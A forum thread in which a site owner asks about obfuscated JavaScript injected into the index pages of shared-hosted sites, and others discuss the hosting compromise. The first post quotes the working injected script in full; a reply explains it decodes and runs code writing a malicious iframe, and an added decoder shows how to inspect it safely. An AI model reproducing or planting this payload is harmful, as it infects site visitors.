What does this code in index.html mean

flamtech (Well-Known Member; joined Jul 25, 2005; messages: 272; reaction score: 0)
Look at the part that starts with <body><script language=JavaScript>
<html>

<head>
<meta http-equiv="Content-Language" content="en-za">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<body><script language=JavaScript>function dwbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,61,52,34,56,45,51,58,46,35,0,0,0,0,0,0,8,62,49,44,4,20,1,28,31,12,37,47,42,41,60,59,33,17,55,36,16,6,0,57,14,43,27,0,0,0,0,26,0,9,29,18,54,30,21,11,5,40,10,22,38,15,13,53,23,32,48,2,39,19,25,24,3,7,50);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(233^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}dwbn15('es4Pn_ityYvt@dat_c565_4PI7C2n_i3Gc@9ydWBe8aqbzwrXpnqm8a3Dzwzy3@PIcndIdb9nlClZL@ogywtblW2UZI3nd@Bj_4Pbz4PbcN9VkwtI8WByzwtURMBkOCrS3wtFeNlUzWPnUIM@dvqyKa3ydiPDUIrxObRZtnrsOIdIdb9n7CrXKGzesw9bU@owRbday@9V7wqbcnR_tClbsvPIc1znsilvk@3TX1PUe@9gHboUx49Z3@PIe56Vx') </script><!-- infobay.co.za -->

<p align="center">INFOBAY.CO.ZA</p>

<p align="center">&nbsp;</p>

<p align="center">&nbsp;</p>

<p align="center"><A HREF="http://www.myhpf.co.uk/banner.asp?friend=129476">
<IMG SRC="http://www.myhpf.co.uk/banners/60x468.gif" BORDER="0" width="468" height="60">
</A>
</p>

<p align="center">Links</p>

<p align="center"><a target="_blank" href="http://www.gratisfax.co.za">
www.gratisfax.co.za</a><br>
<a target="_blank" href="http://www.earn-while-you-surf.com">
www.earn-while-you-surf.com</a><br>
<a target="_blank" href="http://www.earnwhileyousearch.com/">
earnwhileyousearch.com</a></p>

<p align="center">2</p>

<p align="center">&nbsp;</p>

</body>

</html>

About two weeks ago I had a look at the source code of my webpage, and I found some strange looking code in the body. With further investigation, I found that all the index.html files of all the domains hosted at the same company have this strange code in the heading. I also found strange folders with php files in them.

After I had deleted all the files not belonging there, I used an FTP program to publish the index.html again.

I also switched off the Frontpage Extensions on the servers.

I also have a feedback form that I created with the help of http://www.thesitewizard.com/ on another domain.

Today I received a strange response from the feedback form with this message. Then I had a look at my index.html, and sure enough, the code is back again.
flTC5u <a h r e f="http://rvoslavykkut.com/">rvoslavykkut</a>, [u r l=http://nthyykwtansd.com/]nthyykwtansd[/u r l], [l i n k=h t t p://klmzmwcoewyq.com/]klmzmwcoewyq[/link], [u r l]h t t p://volxzdddnxmr.com/[/url]

What is also interesting is that the comment <!--- infobay.co.za --> is present in all the code on the different domains.

So I wonder if the feedback form is the way into my source code.

Somebody suggested that there is a bot on my computer that uses my FTP login and pwd to update my webpages.

I had an updated Norton 360 version on my computer. I uninstalled that and then installed Avast, but I could not find any virus.

I will now download ESET Smart Security to do a scan.

Any help will be appreciated.
 
Sounds like the hosting company's servers have been compromised. Or likely hackers have broken into your web hosts' administrative side
 
Sounds like the hosting company's servers have been compromised. Or likely hackers have broken into your web hosts' administrative side

+1

I've seen this JS code before, and in that case hackers had compromised the server.
 
Contact your hosting provider with this information, and have them take a look at their security - chances are they'll find something...
 
Contact your hosting provider with this information, and have them take a look at their security - chances are they'll find something...
I doubt whether they will admit to a problem on their side.
This is their answer:
Thank you for contacting us.

It looks like you have a trojan installed on the local computer from which you usually access the FTP of your account. It is an absolutely new kind of trojan-bot that, after connecting to your FTP, scans all folders and changes/deletes index pages.
You need to change all passwords, install the newest updates of your antivirus software and scan the computers from which the FTP of the account is being accessed. Clear Internet Explorer history and files, if needed.
You may read details about this issue here: http://ethanzuckerman.com/blog/?p=1346

Should you have any further questions, please feel free to contact us anytime, we are available 24/7.

Kind regards,
Elena Obilets

I don’t buy their story.

Norton 360 didn’t report any Trojans.
Avast didn’t report any Trojans.
ESET NOD32 has just finished and it did not report any Trojans, or any virus for that matter.

The link they gave me talks about the “Russian Business Network”. What I find intriguing is that my hosting company’s 24/7 live support is done from somewhere in the old USSR. Coincidence!?

Earlier this year a spammer gained access to one of my email accounts, and used it to send 419 scams from my email server. This stopped after I changed my password. So I think it is time to change my hosting company but…it is a pain to set up all the accounts again.

I am now using Google Chrome as my default browser.
 
And now you know why I despise hosting companies, especially American ones. They always deny there's a problem and blame you.
If I can make a suggestion here, speak to Texo and get your site(s) moved. Alternatively host them yourself like I do.

I can tell you now, I've had so much less kark in my life since doing my own hosting.
 
FYI,

Google Chrome says INFOBAY.CO.ZA has malware.

The JS Script is encrypted.

I will search some more...

obfuscated :)

But you're partially right... the obfuscated JavaScript picks out different letters from p in that weird for loop into a string c. It then runs the resulting c, which document.writes an iframe onto the page which points to some other site... http://add-content-filter.net/t/?xxxxxxxx.

The xxxxx part seems randomized. Chrome is probably reporting add-content-filter.net, not infobay (I'm really not sure what that one is).

Looking deeper it seems to be exploiting an old browser weakness which makes it run remote malicious code.

If you're sure access to the site wasn't from your side then I'd suggest you change your service provider asap
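
Added example, not part of the thread or any poster's code: the decoding loop described in the post above, rewritten so the decoded text is returned for inspection instead of being passed to eval. The lookup table and the XOR constant 233 are copied from the dwbn15() function in the first post; the names decodeDwbn15 and flagSinks, and the sample decoded string, are assumptions made for this example.

```javascript
// Static decoder for the dwbn15() scheme quoted in the first post.
// Same table and bit-unpacking as the injected script, but nothing is executed.
const TABLE = [63,61,52,34,56,45,51,58,46,35,0,0,0,0,0,0,8,62,49,44,4,20,1,28,31,12,37,47,42,41,60,59,33,17,55,36,16,6,0,57,14,43,27,0,0,0,0,26,0,9,29,18,54,30,21,11,5,40,10,22,38,15,13,53,23,32,48,2,39,19,25,24,3,7,50];

// Each input character maps to a 6-bit value; four characters are packed
// low bits first into three bytes, and every byte is XORed with 233.
function decodeDwbn15(p) {
  let out = '';
  let acc = 0;   // bit accumulator ("j" in the original)
  let shift = 0; // bits currently held in acc ("d" in the original)
  for (let i = 0; i < p.length; i++) {
    // Characters outside the table count as 0, matching the original's behaviour.
    const v = TABLE[p.charCodeAt(i) - 48] | 0;
    acc |= v << shift;
    if (shift) {
      out += String.fromCharCode(233 ^ (acc & 255));
      acc >>= 8;
      shift -= 2;
    } else {
      shift = 6;
    }
  }
  return out;
}

// List the script sinks that appear in decoded text, so an analyst can see
// at a glance whether the payload writes markup or runs further code.
function flagSinks(text) {
  const sinks = ['eval(', 'document.write', '<iframe', 'unescape('];
  const lower = text.toLowerCase();
  return sinks.filter((s) => lower.includes(s));
}

// First 12 characters of the string passed to dwbn15() in the first post.
const SAMPLE_PREFIX = 'es4Pn_ityYvt';

// Constructed sample of decoded output (not taken from the real payload).
const CONSTRUCTED_DECODED =
  'document.write("<iframe src=\\"http://example.invalid/\\"></iframe>")';

console.log(JSON.stringify(decodeDwbn15(SAMPLE_PREFIX)));
console.log(flagSinks(CONSTRUCTED_DECODED));
```

The original evaluates the input in 1024-character chunks but keeps its accumulator across chunks, so decoding the whole string in one pass yields the same text as concatenating the chunks.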
 
Sho't Left. :D That sudden change in topic left me with whiplash!

Sorry :) With reference to this part of the article, I decided to use Chrome instead.
Some of these attacks take advantage of specific features in the Internet Explorer browser to allow the hostile code to load on your machine.
 